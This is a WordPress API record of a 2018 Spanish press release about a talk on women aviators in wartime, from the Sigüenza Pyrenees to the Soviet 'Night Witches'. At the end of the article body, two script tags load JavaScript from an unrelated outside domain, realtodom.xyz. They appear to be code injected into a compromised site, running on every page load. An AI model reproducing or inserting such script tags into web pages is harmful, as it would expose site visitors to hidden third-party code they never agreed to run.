{"id":235,"date":"2018-07-26T11:14:15","date_gmt":"2018-07-26T11:14:15","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=235"},"modified":"2018-07-26T11:14:15","modified_gmt":"2018-07-26T11:14:15","slug":"una-charla-sobre-aviadoras-en-guerra-culmina-el-xiii-ciclo-de-conferencias-de-archivo-de-siguenza","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/26\/una-charla-sobre-aviadoras-en-guerra-culmina-el-xiii-ciclo-de-conferencias-de-archivo-de-siguenza\/","title":{"rendered":"Una charla sobre &#8216;Aviadoras en Guerra&#8217; culmina el XIII Ciclo de Conferencias de Archivo de Sig\u00fcenza"},"content":{"rendered":"<p><strong>La expuso la archivera municipal, Amparo Donderis, en el Centro Cultural el Torre\u00f3n de Sig\u00fcenza<\/strong><\/p>\n<p>La archivera municipal de Sig\u00fcenza, Amparo Donderis, cerr\u00f3 ayer el ciclo de veraniego de conferencias que, organizado por la Asociaci\u00f3n de Amigos del Archivo Hist\u00f3rico de Guadalajara y el Ayuntamiento de Sig\u00fcenza, llegaba a su XIII Edici\u00f3n.<\/p>\n<p>La conferencia llev\u00f3 por t\u00edtulo aviadoras en guerra. Donderis comenz\u00f3 analizando la participaci\u00f3n activa de la mujer en las guerras, reemplazando en los puestos de trabajo a los hombres que marchaban al frente. A las iniciales tareas de colaboraci\u00f3n sanitaria, se fueron a\u00f1adiendo los empleos en la industria b\u00e9lica y en la aviaci\u00f3n.<\/p>\n<p>Frente a las ideas masculinas de que volar era peligroso para ellas, mujeres como la princesa rusa Shakhovskaya, durante la Primera Guerra Mundial, o la espa\u00f1ola Mari Pepa Colomer lanzando folletos propagand\u00edsticos desde su avi\u00f3n en la Guerra Civil, dieron los primeros pasos.<\/p>\n<p>Ellas abrieron el camino a las intr\u00e9pidas aviadoras europeas y americanas que durante la Segunda Guerra Mundial, aumentaron el protagonismo femenino en tareas militares, remolcando aviones averiados, dianas para entrenamiento de pilotos varones e incluso entrando en combate a\u00e9reo contra los alemanes como fue el \u00fanico y excepcional caso de las aviadoras sovi\u00e9ticas &#8216;Las brujas de la noche&#8217; que escribieron una de las p\u00e1ginas m\u00e1s conmovedoras de la historia de la Aviaci\u00f3n. Demostraron estar en igualdad de condiciones con los pilotos masculinos, combatieron derribando aviones y desempe\u00f1aron un acci\u00f3n fundamental en la batalla final contra Alemania.<\/p>\n<p>\u00abAl finalizar cada una de estas guerras, aquellas mujeres, apasionadas, con coraje, vocaci\u00f3n, esp\u00edritu de superaci\u00f3n y gusto por la aventura que, superando los prejuicios de la sociedad de los a\u00f1os 40, con sus haza\u00f1as hab\u00edan escrito p\u00e1ginas importantes de la historia, vieron como, al contrario que los hombres, ca\u00eda sobre su nombre y el de sus compa\u00f1eras fallecidas, un manto de silencio que cubr\u00eda sus vidas y sus haza\u00f1as en el cielo\u00bb, afirm\u00f3 la archivera para terminar.<\/p>\n<p>Por eso precisamente, este ciclo ha recuperado su historia, con el fin de contribuir a que sus nombres no se borren y ocupen el lugar que merecen por su contribuci\u00f3n a la historia de la Aviaci\u00f3n. \u00abDesde el Ayuntamiento, damos la enhorabuena a la Asociaci\u00f3n organizadora, por la selecci\u00f3n del tema y su exposici\u00f3n, que adem\u00e1s de un magn\u00edfico contexto hist\u00f3rico, en dos excelentes conferencias, ha hablado tambi\u00e9n de igualdad de g\u00e9nero\u00bb, valora Sonsoles Arcones, concejala de Cultura del Ayuntamiento de Sig\u00fcenza.<\/p>\n<p>M\u00e1s informaci\u00f3n:<br \/>\nAyuntamiento de Sig\u00fcenza. Prensa. 949 390 850<br \/>\nGabinete de Prensa. Javier Bravo. 606 411 053<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>La expuso la archivera municipal, Amparo Donderis, en el Centro Cultural el Torre\u00f3n de Sig\u00fcenza La archivera municipal de Sig\u00fcenza, Amparo Donderis, cerr\u00f3 ayer el <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/26\/una-charla-sobre-aviadoras-en-guerra-culmina-el-xiii-ciclo-de-conferencias-de-archivo-de-siguenza\/\" title=\"Una charla sobre &#8216;Aviadoras en Guerra&#8217; culmina el XIII Ciclo de Conferencias de Archivo de Sig\u00fcenza\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":236,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-235","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-castilla-la-mancha"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=235"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/235\/revisions"}],"predecessor-version":[{"id":237,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/235\/revisions\/237"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/236"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=235"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}